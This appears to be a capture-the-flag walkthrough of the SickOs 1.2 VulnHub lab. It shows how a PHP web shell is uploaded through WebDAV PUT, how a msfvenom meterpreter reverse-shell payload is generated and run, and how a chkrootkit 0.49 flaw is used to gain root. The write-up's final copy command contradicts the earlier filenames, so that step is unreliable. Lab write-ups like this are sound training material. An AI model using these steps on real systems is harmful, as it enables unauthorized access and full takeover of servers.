SickOs 1.2

SickOs 1.2 - Vulnhub

First, Nmap was run to scan for open ports and running service versions.

nmap -sV

Starting Nmap 7.30 ( ) at 2016-10-14 11:29 MDT
Nmap scan report for
Host is up (0.00059s latency).
Not shown: 998 filtered ports
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
MAC Address: 00:0C:29:09:A5:6D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 24.23 seconds

Next, dirb was run to scan for directories on the web service running on port 80. The “test” directory was discovered.

dirb /usr/share/wordlists/dirb/big.txt

DIRB v2.22    
By The Dark Raver

START_TIME: Fri Oct 14 14:39:53 2016
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt


GENERATED WORDS: 20458                                                         

---- Scanning URL: ----
==> DIRECTORY:                                    
+ (CODE:403|SIZE:345)                             
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
(Use mode '-w' if you want to scan it anyway)
END_TIME: Fri Oct 14 14:40:13 2016

Curl was used to check the allowed HTTP methods by sending the OPTIONS request type. On the test directory, we found we have permission to use the PUT method to upload files to the server.

curl -v -X OPTIONS
*   Trying
* Connected to ( port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host:
> User-Agent: curl/7.50.1
> Accept: */*
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Location:
< Content-Length: 0
< Date: Fri, 14 Oct 2016 20:38:46 GMT
< Server: lighttpd/1.4.28
* Connection #0 to host left intact

Using curl I was able to upload a php backdoor to the server.

cp /usr/share/webshells/php/php-backdoor.php bd.php
curl -T bd.php -0

Next, to get a reverse shell I generated an elf payload and executed it using the php backdoor.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost= lport=443 -f elf -o payload
curl -T payload -0

Looking at installed software we can see chkrootkit 0.49 is installed. By searching exploit-db, we can see the running version is vulnerable to privilege escalation.

dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name           Version        Description
rc  chkrootkit     0.49-4ubuntu1. rootkit detector

searchsploit chkrootkit 0.49
---------------------------------------------------------------------- ----------------------------------
Exploit Title                                                         | Path
---------------------------------------------------------------------- ----------------------------------
Chkrootkit 0.49 - Privilege Escalation"                               | /linux/local/33899.txt
---------------------------------------------------------------------- ----------------------------------

The exploitdb entry below explains that this vulnerability is exploited by putting a binary file in ‘/tmp’ named ‘update’.

cat /usr/share/exploitdb/platforms/linux/local/33899.txt 

Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.

If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.

The ELF payload generated earlier was then copied to /tmp/update.

cp /var/www/test/payload2 /tmp/upload

Finally, the reverse shell connects back to us, and we are able to read the proof file.